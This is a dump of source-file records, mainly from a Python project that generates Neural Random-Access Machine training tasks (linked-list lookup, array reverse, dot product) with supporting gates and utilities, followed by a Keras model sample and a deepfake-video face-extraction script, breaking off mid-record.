"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\nclass TaskListK(Task):\n \"\"\" [ListK]\n Given a pointer to the head of a linked list and a number k, find the value of the\n k-th element on the list. List nodes are represented as two adjacent memory cells: a pointer\n to the next node and a value. Elements are in random locations in the memory, so that\n the network needs to follow the pointers to find the correct element. Input is given as:\n head, k, out, ... where head is a pointer to the first node on the list, k indicates how many\n hops are needed and out is a cell where the output should be put.\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n list_size = int((self.max_int - 4) / 2)\n hops = np.random.randint(0, list_size, size=(self.batch_size))\n list_elements = np.random.randint(0, self.max_int, size=(self.batch_size, list_size))\n lists_elements_permutations = np.stack([np.random.permutation(list_size) for _ in range(self.batch_size)], axis=0)\n init_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n\n # Create for each example the list\n for example in range(self.batch_size):\n for j, permidx in enumerate(lists_elements_permutations[example]):\n next_element_pointer = np.where(lists_elements_permutations[example] == permidx + 1)[0]\n if permidx == 0: # If the node is the first than set the pointer in the first memory position\n init_mem[example, 0] = 3 + 2 * j\n\n init_mem[example, 3 + (2 * j)] = \\\n -1.0 if len(next_element_pointer) == 0 else 3 + (2 * next_element_pointer[0]) # Set the pointer to the next list node\n init_mem[example, 3 + (2 * j) + 1] = list_elements[example, j] # Set the value of the list node\n init_mem[:, 2] = 2\n init_mem[:, 1] = hops\n init_mem[:, -1] = -1\n\n out_mem = init_mem.copy()\n for example in range(self.batch_size):\n output_value = -1.0\n pointer = out_mem[example, 0]\n for hop in range(out_mem[example, 1] + 1):\n output_value = out_mem[example, pointer + 1]\n pointer = out_mem[example, pointer]\n out_mem[example, out_mem[example, 2]] = output_value\n\n cost_mask = np.zeros((self.batch_size, self.max_int), dtype=np.int8)\n cost_mask[:, 2] = 1\n\n return init_mem, out_mem, cost_mask\n"
},
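The pointer-chasing this task expects can be made explicit with a small decode helper; a sketch that walks one sample's memory using the layout create() produces above (head pointer in cell 0, hop count in cell 1, each node stored as a (next-pointer, value) pair):

    import numpy as np

    def follow_list(mem: np.ndarray) -> int:
        """Walk the linked list in one sample's memory and return the reached value."""
        pointer = mem[0]
        value = -1
        for _ in range(mem[1] + 1):   # k hops, mirroring the loop in create()
            value = mem[pointer + 1]  # the node's value
            pointer = mem[pointer]    # the node's next-pointer
        return value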
{
"alpha_fraction": 0.550561785697937,
"alphanum_fraction": 0.550561785697937,
"avg_line_length": 15.6875,
"blob_id": "f466d522301567e0c714e2549453812eebeb4573",
"content_id": "bc27187b1d9e915442225f68110379f59b67ba4d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 267,
"license_type": "permissive",
"max_line_length": 34,
"num_lines": 16,
"path": "/App.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Project\nfrom Singleton import Singleton\n\n\nclass App(metaclass=Singleton):\n\n _conf = {\n \"images_path\": \"./images/\"\n }\n\n @staticmethod\n def get(name):\n try:\n return App._conf[name]\n except KeyError:\n return None\n"
},
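Usage of the configuration singleton above; "images_path" is the one key actually defined in _conf:

    from App import App

    print(App.get("images_path"))  # -> "./images/"
    print(App.get("missing"))      # -> None for unknown keys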
{
"alpha_fraction": 0.5573248267173767,
"alphanum_fraction": 0.56263267993927,
"avg_line_length": 27.57575798034668,
"blob_id": "6f74ba06a0ab3f040e74abf2d52855dd94aa2c16",
"content_id": "661393d4ac889451bb39a892f1e4f9a26ba47800",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 942,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 33,
"path": "/tasks/Task.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom util import encode\n\nclass Task(object):\n \"\"\" Base class for all task of NRAM \"\"\"\n\n def __init__(self, batch_size: int, max_int: int, num_regs: int, timestep: int, sequence_size: int) -> None:\n self.batch_size = batch_size\n self.max_int = max_int\n self.sequence_size = sequence_size\n self.num_regs = num_regs\n self.timesteps = timestep\n\n def __call__(self, *args, **kwargs):\n in_mem, out_mem, error_mask = self.create()\n return encode(in_mem), \\\n out_mem, \\\n error_mask, \\\n self.init_regs(np.zeros((self.batch_size, self.num_regs, self.max_int), dtype=np.float32)), \\\n self.timesteps\n\n def __str__(self):\n return self.__class__.__name__\n\n def init_regs(self, regs):\n regs[:, :, 0] = 1.0\n return regs\n\n def create(self):\n raise NotImplementedError()"
},
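A hypothetical minimal subclass (not part of this repo) showing the contract that create() must honour: return (init_mem, out_mem, error_mask) as integer arrays of shape (batch_size, max_int):

    import numpy as np

    from tasks.Task import Task


    class TaskIdentity(Task):
        """Hypothetical task whose expected output equals its input."""

        def create(self) -> (np.ndarray, np.ndarray, np.ndarray):
            init_mem = np.random.randint(0, self.max_int,
                                         size=(self.batch_size, self.max_int), dtype=np.int32)
            out_mem = init_mem.copy()
            error_mask = np.ones((self.batch_size, self.max_int), dtype=np.int8)
            return init_mem, out_mem, error_mask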
{
"alpha_fraction": 0.581818163394928,
"alphanum_fraction": 0.5977272987365723,
"avg_line_length": 35.66666793823242,
"blob_id": "4c2ebff63522469077823f2964ffa073c77342c3",
"content_id": "efb1b3c431a17a275e54d9661c24c3508e266e62",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 440,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 12,
"path": "/gates/Sub.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nfrom numpy import tensordot, roll, transpose, stack\nfrom gates.Gate import Gate\n\nclass Sub(Gate):\n\n def __call__(self, M: np.array, A: np.array = None, B: np.array = None) -> (np.array, np.array):\n rows = [roll(B[:], shift=shift, axis=1)\n for shift in range(M.shape[1])]\n B_prime = transpose(stack(rows, axis=1), axes=[0, 2, 1])\n return M, tensordot(A, B_prime, axes=2)[None, ...]\n"
},
{
"alpha_fraction": 0.5913891196250916,
"alphanum_fraction": 0.611697793006897,
"avg_line_length": 38.709678649902344,
"blob_id": "f3553f3ee459596136f42c69e8274a4bdb315284",
"content_id": "a80533e3e01b7d07957f5ff5aa98787e7292c552",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1239,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 31,
"path": "/tasks/TaskReverse.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\n\nclass TaskReverse(Task):\n \"\"\" [Reverse]\n Given an array and a pointer to the destination, copy all elements from the array\n\tin reversed order. Input is given as p, A[0], ..., A[n − 1] where p points one element after\n A[n−1]. The expected output is A[n−1], ..., A[0] at positions p, ..., p+n−1 respectively.\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n remaining_size = int(self.max_int - 2)\n vector_size = min(int(remaining_size / 2), self.sequence_size)\n starting_point = int(np.floor(self.max_int / 2))\n\n init_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n init_mem[:, 0] = starting_point\n init_mem[:, 1:1 + vector_size] = \\\n np.random.randint(1, self.max_int, size=(self.batch_size, vector_size), dtype=np.int32)\n\n out_mem = init_mem.copy()\n out_mem[:, -1 - vector_size: - 1] = np.flip(out_mem[:, 1:1 + vector_size], axis=1)\n\n error_mask = np.zeros((self.batch_size, self.max_int), dtype=np.int8)\n error_mask[:, -1 - vector_size: - 1] = np.ones((self.batch_size, vector_size))\n\n return init_mem, out_mem, error_mask\n"
},
{
"alpha_fraction": 0.61834317445755,
"alphanum_fraction": 0.6301774978637695,
"avg_line_length": 27.25,
"blob_id": "0e5e0b73c6523dbba86bb3d4cdfc9735e7476e5c",
"content_id": "8301e4a5dc2f495d81ef1884b6911c68608df14b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 338,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 12,
"path": "/gates/Max.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom gates.Gate import Gate, GateArity\nfrom gates.LessThan import LessThan\n\nclass Max(Gate):\n\n def __call__(self, M: np.array, A: np.array = None, B: np.array = None) -> (np.array, np.array):\n _, Z = LessThan(GateArity.BINARY.value)(M, A, B)\n return M, A if Z[0, 0] > Z[0, 1] else B"
},
{
"alpha_fraction": 0.5667752623558044,
"alphanum_fraction": 0.5845096111297607,
"avg_line_length": 33.54999923706055,
"blob_id": "e73aca98eab4462c38dc2aa80e33ed63b33ab622",
"content_id": "4f629c36271bcadaa37bde3edabddc19efa6ea38",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2763,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 80,
"path": "/util.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Standard\nimport os\nimport shutil\n\n# Vendor\nimport matplotlib as mpl\nmpl.use(\"Agg\")\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef to_one_hot(val, shape: int = None) -> np.ndarray:\n\n def to_one_hot_array(val: np.ndarray) -> np.ndarray:\n b = np.zeros((val.shape[0], val.shape[0]), dtype=np.float32)\n b[np.arange(val.shape[0]), val] = 1\n return b\n\n def to_one_hot_number(val: int, shape: int) -> np.ndarray:\n b = np.zeros((shape), dtype=np.float32)\n b[val] = 1\n return b\n\n return to_one_hot_array(val) if shape is None else to_one_hot_number(val, shape)\n\n\ndef encode(M: np.array) -> np.ndarray:\n \"\"\" Make the fuzzy version of a list of integer memories \"\"\"\n return np.stack([to_one_hot(s) for s in M], axis=0)\n\n\ndef create_dir(path: str, flush: bool = False) -> None:\n if not os.path.exists(path):\n os.mkdir(path, 0o755)\n\n if flush:\n for fd in os.listdir(path):\n file_path = os.path.join(path, fd)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n except Exception as e:\n print(e)\n\n\ndef print_memories(M: np.ndarray, desired_mem: np.ndarray, cost_mask: np.ndarray, path: str, test_idx: int) -> bool:\n \"\"\" Print the memories of the samples \"\"\"\n int_M = M.argmax(axis=2)\n c = 0 # See paper Pag. 7, Sub section 4.2 Tasks\n m = np.sum(cost_mask) # See paper Pag. 7, Sub section 4.2 Tasks\n one_hot_mem = np.zeros((desired_mem.shape[0], desired_mem.shape[1]), dtype=np.int)\n\n for sample in range(desired_mem.shape[0]):\n for col in range(desired_mem.shape[1]):\n if desired_mem[sample, col] == int_M[sample, col]:\n one_hot_mem[sample, col] = 1\n if cost_mask[0, col] == 1:\n c += 1\n perc_correct = c / m\n with open(\"%s/tests-results.csv\" % os.path.abspath(os.path.join(path, os.pardir)), \"a+\") as f:\n f.write(\"%d,%f\\n\" % (np.sum(cost_mask[0]), 1 - perc_correct))\n\n fig = plt.figure()\n fig.suptitle('Correct: %f, Error: %f' % (perc_correct, (1 - perc_correct)), fontsize=14)\n\n plt.imshow(one_hot_mem, cmap=\"gray\", vmin=0.0, vmax=1.0)\n plt.savefig(\"%s/%d.memories.grey.png\" % (path, test_idx))\n\n differences_mem = np.zeros(\n (desired_mem.shape[0], desired_mem.shape[1]), dtype=np.float32)\n for s in range(desired_mem.shape[0]):\n for c in range(desired_mem.shape[1]):\n differences_mem[s, c] = M[s, c, desired_mem[s, c]]\n\n plt.imshow(differences_mem, cmap=\"Blues\", vmin=0.0, vmax=1.0)\n plt.savefig(\"%s/%d.memories.blues.png\" % (path, test_idx))\n\n return True"
},
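A quick check of the helpers above: encode turns a batch of integer memories into the fuzzy one-hot form consumed by the gates, with each cell becoming a distribution over values.

    import numpy as np

    from util import encode

    M = np.array([[0, 2, 1]])       # one sample, max_int = 3
    fuzzy = encode(M)
    assert fuzzy.shape == (1, 3, 3)
    assert fuzzy[0, 1, 2] == 1.0    # cell 1 holds the value 2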
{
"alpha_fraction": 0.5930656790733337,
"alphanum_fraction": 0.6113138794898987,
"avg_line_length": 41.153846740722656,
"blob_id": "82aa9116672f496eb72cda2a960ee7b009bbaf46",
"content_id": "4fc1213676c3f90f7f38a069700090ca51b6275a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1648,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 39,
"path": "/tasks/TaskProduct.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\n\nclass TaskProduct(Task):\n \"\"\" [Product]\n Given pointers to 2 arrays A and B, and the pointer to the output o,\n sum the two arrays into one array. The input is given as:\n a, b, o, A[0], .., A[n − 1], G, B[0], ..., B[m − 1], G,\n where G is a special guardian value, a and b point to the first\n elements of arrays A and B respectively, and o is a slot for the output.\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n offset = 3\n remaining_size = int(self.max_int - 5)\n arrays_memory_size = int(remaining_size / 2)\n\n init_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n list_elements_a = np.random.randint(1, self.max_int, size=(self.batch_size, arrays_memory_size), dtype=np.int32)\n list_elements_b = np.random.randint(1, self.max_int, size=(self.batch_size, arrays_memory_size), dtype=np.int32)\n prod_a_b = np.mod(np.sum(np.multiply(list_elements_a, list_elements_b), axis=1), self.max_int)\n\n init_mem[:, 0] = offset\n init_mem[:, 1] = offset + arrays_memory_size + 1\n init_mem[:, 2] = offset + (2 * arrays_memory_size) + 2\n init_mem[:, offset:(offset + arrays_memory_size)] = list_elements_a\n init_mem[:, (offset + arrays_memory_size + 1):(offset + (2 * arrays_memory_size + 1))] = list_elements_b\n\n out_mem = init_mem.copy()\n out_mem[:, offset - 1] = prod_a_b\n\n cost_mask = np.zeros((self.batch_size, self.max_int), dtype=np.int8)\n cost_mask[:, offset - 1] = 1\n\n return init_mem, out_mem, cost_mask\n"
}
] | 34 |
bmuchemi/NewsAPI
|
https://github.com/bmuchemi/NewsAPI
|
a8cd9986734a898fcfeec084a6dfe517babf4080
|
b82d89fe7cc29fd27b5517b58a1f5b4a240c4b21
|
0c6da5b7292f40865f5bb4bcac31f61a815ca70c
|
refs/heads/master
| 2023-07-09T00:16:25.644381 | 2021-08-10T06:00:08 | 2021-08-10T06:00:08 | 394,534,579 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7620818018913269,
"alphanum_fraction": 0.7620818018913269,
"avg_line_length": 21.41666603088379,
"blob_id": "9c581076c52c9df630320acc42189c782e90d26d",
"content_id": "1691206d9a8ad697b86592c9bc25877ba35596d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 269,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 12,
"path": "/app/request.py",
"repo_name": "bmuchemi/NewsAPI",
"src_encoding": "UTF-8",
"text": "from app import app\nimport urllib.request,json\nfrom .models import sources,articles\n\nSources = sources.Sources\nArticles = articles.Articles\n\n# Getting api key\napi_key = app.config['NEWS_API_KEY']\n\n# Getting the movie base url\nbase_url = app.config[\"NEWS_API_BASE_URL\"]\n"
},
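request.py above defines the API key and base URL but not the get_data that views.py (below) imports. A minimal sketch of one possible implementation, assuming base_url points at a News API endpoint that accepts an apiKey query parameter; the URL shape and response handling are assumptions, not code from the repo:

    def get_data():
        '''
        Hypothetical completion: fetch articles from the News API and
        return the parsed 'articles' list, or None on an empty response.
        '''
        get_data_url = '{}?apiKey={}'.format(base_url, api_key)
        with urllib.request.urlopen(get_data_url) as url:
            response = json.loads(url.read())
        return response.get('articles')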
{
"alpha_fraction": 0.5652173757553101,
"alphanum_fraction": 0.5652173757553101,
"avg_line_length": 22,
"blob_id": "b9d5b7e37d9afd6e951a6c755c0738c699e3d6fa",
"content_id": "cd5ed1b9a289119a6a64e5787e8e05b166969023",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 23,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 1,
"path": "/instance/config.py",
"repo_name": "bmuchemi/NewsAPI",
"src_encoding": "UTF-8",
"text": "NEWS_API_KEY = 'b6f5cab23a514902a53ba60e0a0b09f8'\n"
},
{
"alpha_fraction": 0.6804407835006714,
"alphanum_fraction": 0.6804407835006714,
"avg_line_length": 21.6875,
"blob_id": "b3c45d1c4cfb278868f7a208988159d8251efacd",
"content_id": "0179f03cc277bda740daced5a6cf630c49f7e15b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 363,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 16,
"path": "/app/views.py",
"repo_name": "bmuchemi/NewsAPI",
"src_encoding": "UTF-8",
"text": "from flask import render_template\nfrom app import app\nfrom .request import get_data\n\n# Views\[email protected]('/')\ndef index():\n\n '''\n View root page function that returns the index page and its data\n '''\n\n popular_news = get_data()\n print(popular_news)\n title = 'NEWSROOM'\n return render_template('index.html', title = title,popular=popular_news)\n"
}
] | 3 |
samoor64/Python_HW_Bank_Poll
|
https://github.com/samoor64/Python_HW_Bank_Poll
|
4ab2d0837cd3f01041a158967107df80cbb8998b
|
1c672559b691994cff7e3a294ff2b30235153084
|
96fc00fa9e86fb01a40f4f9e43a7fed5c484c939
|
refs/heads/master
| 2020-03-23T06:55:03.927437 | 2018-07-17T05:44:09 | 2018-07-17T05:44:09 | 141,237,033 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.75,
"avg_line_length": 15,
"blob_id": "a66e43f1c2367a77f4476c6d6347c9221b798eb3",
"content_id": "9ccf57bf6a282f74e5a0660c4bf7b98f536d9ea2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 32,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 2,
"path": "/README.md",
"repo_name": "samoor64/Python_HW_Bank_Poll",
"src_encoding": "UTF-8",
"text": "# Python_HW_Bank_Poll\nPython HW\n"
},
{
"alpha_fraction": 0.5146506428718567,
"alphanum_fraction": 0.5251690745353699,
"avg_line_length": 34.02702713012695,
"blob_id": "dc9aa5a6db90fc7d28081a2f4f74e927eb3cd5a2",
"content_id": "4ed3319d78da36229dafddb167bbb9b2300475d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1331,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 37,
"path": "/Poll_HW.py",
"repo_name": "samoor64/Python_HW_Bank_Poll",
"src_encoding": "UTF-8",
"text": "import os\r\nimport csv\r\n\r\n#Set Path\r\ncsvpathh = os.path.join(\"Resources\", \"election_data.csv\")\r\n\r\n#Open CSV \r\nwith open(csvpathh, 'r') as csvfile:\r\n csvreader = csv.reader(csvfile, delimiter=\",\")\r\n csv_header = next(csvreader)\r\n\r\n total_votes = 0\r\n votes_khan = 0\r\n voter_correy = 0\r\n voter_li = 0\r\n voter_otooley = 0\r\n for row in csvreader:\r\n total_votes += 1\r\n if row[2] == \"Khan\":\r\n votes_khan += 1\r\n if row[2] == \"Correy\":\r\n voter_correy += 1\r\n if row[2] == \"Li\":\r\n voter_li += 1\r\n if row[2] == \"O'Tooley\":\r\n voter_otooley += 1\r\n winner = {\"Khan\": int(votes_khan), \"Correy\": int(voter_correy), \"Li\": int(voter_li), \"OTooley\": int(voter_otooley)}\r\n print(\"Election Results\")\r\n print(\"-------------------------\")\r\n print(\"Total Votes: \" + str(total_votes))\r\n print(\"-------------------------\")\r\n print(\"Khan: \" + str(votes_khan) + str(int(votes_khan)/int(total_votes)))\r\n print(\"Correy: \" + str(voter_correy) + str(int(voter_correy)/int(total_votes)))\r\n print(\"Li: \" + str(voter_li) + str(int(voter_li)/int(total_votes)))\r\n print(\"O'Tooley: \" + str(voter_otooley) + str(int(voter_otooley)/int(total_votes)))\r\n print(\"-------------------------\")\r\n print(\"Winner: \" + max(winner, key=winner.get))"
},
{
"alpha_fraction": 0.5917843580245972,
"alphanum_fraction": 0.5988446474075317,
"avg_line_length": 31.191490173339844,
"blob_id": "6fff2f35654d2d44d79dab15f2c183bb319edd44",
"content_id": "df918b795d8919550e58f602c74bc07c56e24008",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1558,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 47,
"path": "/PY_HW.py",
"repo_name": "samoor64/Python_HW_Bank_Poll",
"src_encoding": "UTF-8",
"text": "import os\r\nimport csv\r\n\r\n#Set Path\r\ncsvpath = os.path.join(\"Resources\", \"budget_data.csv\")\r\n\r\n#Open CSV \r\nwith open(csvpath, 'r') as csvfile:\r\n csvreader = csv.reader(csvfile, delimiter=\",\")\r\n csv_header = next(csvreader)\r\n\r\n\r\n #print(f\"CSV Header: {csv_header}\")\r\n\r\n#Count month and Profit/Loss\r\n month_count = 0\r\n total_pl = 0\r\n number_value = []\r\n month_list = []\r\n first_row = next(csvreader)\r\n previoius_profit_loss = int(first_row[1])\r\n print(previoius_profit_loss)\r\n print(type(previoius_profit_loss))\r\n month_count = month_count + 1\r\n total_pl += int(first_row[1])\r\n for row in csvreader:\r\n month_count = month_count + 1\r\n total_pl += int(row[1])\r\n number_value.append(int(row[1]))\r\n month_list.append(row[0])\r\n change = int(row[1]) - previoius_profit_loss\r\n previoius_profit_loss = int(row[1])\r\n max_value_index = number_value.index(max(number_value))\r\n min_value_index = number_value.index(min(number_value))\r\n Month_Max = month_list[max_value_index]\r\n Month_Min = month_list[min_value_index]\r\n\r\n\r\n\r\n print(\"Financial Analysis\")\r\n print(\"----------------------------\")\r\n print(\"Total Months: \" + str(month_count))\r\n print(\"Total Profit: \" + str(total_pl))\r\n print(\"Average Change:\", previoius_profit_loss/int(month_count))\r\n print(\"----------------------------\")\r\n print(\"Greatest Increase in Porfits {} {}\".format(Month_Max, max(number_value)))\r\n print(\"Greatest Decrease in Porfits {} {}\".format(Month_Min, min(number_value)))"
}
] | 3 |
vishal3477/vishal
|
https://github.com/vishal3477/vishal
|
739b979158ea73e73a88862394e8efe97bbdecbe
|
702dc83650d1abcd2931cac9e4f7b274f4b8aa43
|
78e9bcff14a32218e5bd72939245963e655b82ad
|
refs/heads/master
| 2020-07-10T07:45:59.187394 | 2020-05-14T03:18:13 | 2020-05-14T03:18:13 | 204,208,354 | 0 | 0 | null | 2019-08-24T20:20:11 | 2020-05-14T01:59:56 | 2020-05-14T03:06:06 |
MATLAB
|
[
{
"alpha_fraction": 0.7149999737739563,
"alphanum_fraction": 0.7413333058357239,
"avg_line_length": 30.589473724365234,
"blob_id": "639cd3915417080223ac611f82426c8bf4ed866a",
"content_id": "236015e1def3fc1794d80f605ec83eb011a7e635",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3000,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 95,
"path": "/Modified LSTM RNN/sample_Model_architecture1.py",
"repo_name": "vishal3477/vishal",
"src_encoding": "UTF-8",
"text": "'''\nSample Architecture using the Model API\n'''\n# typical useful libararies\nfrom __future__ import print_function\nimport numpy as np\nimport os\nimport sys\n\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.utils import to_categorical\n\nfrom keras.preprocessing import sequence\nfrom keras.models import Model\nfrom keras.models import Sequential\nimport keras.layers\nfrom keras.layers import Dense, Dropout, Embedding, LSTM, Bidirectional\nfrom keras.layers import Conv1D, MaxPooling1D, Input, GlobalMaxPooling1D\nfrom keras.datasets import imdb, reuters\nfrom keras import backend as K\nfrom keras.callbacks import Callback\nimport pdb\n\n#Optional definitions \nBASE_DIR = 'YOUR BASE DIRECTORY'\nGLOVE_DIR = os.path.join(BASE_DIR, 'glove.6B')\nTEXT_DATA_DIR = os.path.join(BASE_DIR, '20_newsgroup')\nMAX_SEQUENCE_LENGTH = 1000\nMAX_NB_WORDS = 20000\nEMBEDDING_DIM = 100\nVALIDATION_SPLIT = 0.2\nbatch_size = 128\nhidden_units = 150\n\n#May setup directory for results--Optional\nresults_folder = 'Directory for your results'\nif os.path.exists(results_folder) == False:\n os.makedirs(results_folder)\nfilename = os.path.join(results_folder, 'results.txt')\n\n#Assuming your data is split between training and validation pairs\nx_train = data[:-num_validation_samples]\ny_train = labels[:-num_validation_samples]\nx_val = data[-num_validation_samples:]\ny_val = labels[-num_validation_samples:]\n\n#DEFINE YOUR ARCHITECTURE using the MODEL API in KERAS\n\n#Input layer\nsequence_input = Input(shape=(MAX_SEQUENCE_LENGTH,))\n\n#FOR EXAMPLE, LSTM3 processing applied to text embedding layer- model\nx1 = Embedding(MAX_NB_WORDS, 300, input_length=MAX_SEQUENCE_LENGTH)(sequence_input)\nlstm = LSTM3(implementation= 1, units=hidden_units,\n activation='sigmoid',\n input_shape=x_train.shape[1:])\nx1 = lstm(x1)\n\n# ConvNet processing--model\nembedded_sequences = embedding_layer(sequence_input)\nx2 = Conv1D(150, 3, activation='relu')(embedded_sequences)\nx2 = MaxPooling1D(3)(x2)\nx2 = Conv1D(150, 3, activation='relu')(x2)\nx2 = MaxPooling1D(3)(x2)\nx2 = Conv1D(150, 3, activation='relu')(x2)\nx2 = GlobalMaxPooling1D()(x2)\nx2 = Dense(150, activation='relu')(x2)\n\n# concatenate lstm-type and ConvNet models\nconc = keras.layers.Concatenate()([x1, x2])\nprint(conc.shape)\n\n#may perform furhter processing\nx = Dropout(0.5)(conc)\npreds = Dense(len(labels_index), activation='softmax')(x)\n\n#Your final input-output model\nmodel = Model(sequence_input, preds)\n\n# You may try using different optimizers and different optimizer configs, e.g., \nmodel.compile('adam', 'binary_crossentropy', metrics=['accuracy'])\n\nprint('Train...')\n## You may define a callback function to collect history, e.g. loss, ... \nhistory = callback_function(filename)\n## YOU need to define the above function\n\n#training using fit\n\nmodel.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=100,\n callbacks=[history],\n validation_data=[x_val, y_val])"
},
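The script above deliberately leaves callback_function undefined ("YOU need to define the above function"). A minimal sketch of one possible implementation using Keras 2.x's Callback API; the log format here is an arbitrary choice:

    from keras.callbacks import Callback


    class callback_function(Callback):
        """Hypothetical history logger: appends each epoch's metrics to a text file."""

        def __init__(self, filename):
            super(callback_function, self).__init__()
            self.filename = filename

        def on_epoch_end(self, epoch, logs=None):
            logs = logs or {}
            with open(self.filename, 'a') as f:
                f.write('epoch %d: %s\n' % (epoch, sorted(logs.items())))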
{
"alpha_fraction": 0.5686102509498596,
"alphanum_fraction": 0.584392786026001,
"avg_line_length": 39.69643020629883,
"blob_id": "fc0b7c0b97242eefad524766fbae4e0c75b73c06",
"content_id": "ffdb6a31fe71d503d9df08e67c0e2975e59f321e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2281,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 56,
"path": "/Deepfake video detection model/pre_proc.py",
"repo_name": "vishal3477/vishal",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport cv2\nimport os\n#from RetinaFace.retinaface import RetinaFace\n#from RetinaFace.face_align import norm_crop\nfrom torchvision import transforms\nimport random\nimport torch\nimport pickle\nfrom facenet_pytorch import MTCNN\nimport glob\nfrom PIL import Image\n\n\nmtcnn = MTCNN(select_largest=False)\nmetadatas=[]\ndata_dir=\"/mnt/gs18/scratch/users/asnanivi/1/\"\n#print(data_dir)\n\nfolders=[\"dfdc_train_part_08\",\"dfdc_train_part_09\",\"dfdc_train_part_10\",\"dfdc_train_part_11\",\"dfdc_train_part_12\",\"dfdc_train_part_00\"]\n#metadatas=pd.read_json(data_dir + \"/deepfake-detection-challenge/\"+folders[0]+\"/metadata.json\", orient='index')\nfor f in folders:\n metadatas.append([pd.read_json(data_dir +f + \"/metadata.json\", orient='index'), f])\nn_frames=30\nfor metadata in metadatas:\n for foldername in folders:\n #filenames = glob.glob('C:/Users/visha/Desktop/MSU/Prof. Liu/deepfake-detection-challenge/'+foldername+'/*.mp4')\n for index, row in metadata[0].iterrows():\n v_cap = cv2.VideoCapture(data_dir+foldername+\"/\"+index)\n v_len = int(v_cap.get(cv2.CAP_PROP_FRAME_COUNT))\n print(v_len)\n # Loop through video\n batch_size = 32\n frames = []\n boxes = []\n landmarks = []\n view_frames = []\n view_boxes = []\n view_landmarks = []\n sample = np.linspace(0, v_len - 1, n_frames).astype(int)\n for count in range(v_len):\n if count in sample:\n # Load frame\n success, frame = v_cap.read()\n if not success:\n continue\n\n # Add to batch, resizing for speed\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = Image.fromarray(frame)\n frame = frame.resize([int(f * 0.25) for f in frame.size])\n #frames.append(frame)\n out_name = \"{:s}_{:0>4d}.png\".format(index.split('.')[0], count)\n #save_paths = [\"D:/facebook_frames/\"+foldername+\"/\"+'image_{i}.jpg' for i in range(v_len)]\n mtcnn(frame, save_path=\"/mnt/home/asnanivi/Desktop/Deepfake/\"+foldername+\"/\"+out_name)\n\n\n"
},
{
"alpha_fraction": 0.8709677457809448,
"alphanum_fraction": 0.8709677457809448,
"avg_line_length": 30,
"blob_id": "c2f237bbdcd531922d8f44a1a183684f982fde60",
"content_id": "b252ccba2bcc843a5082f7618e9e67714570c602",
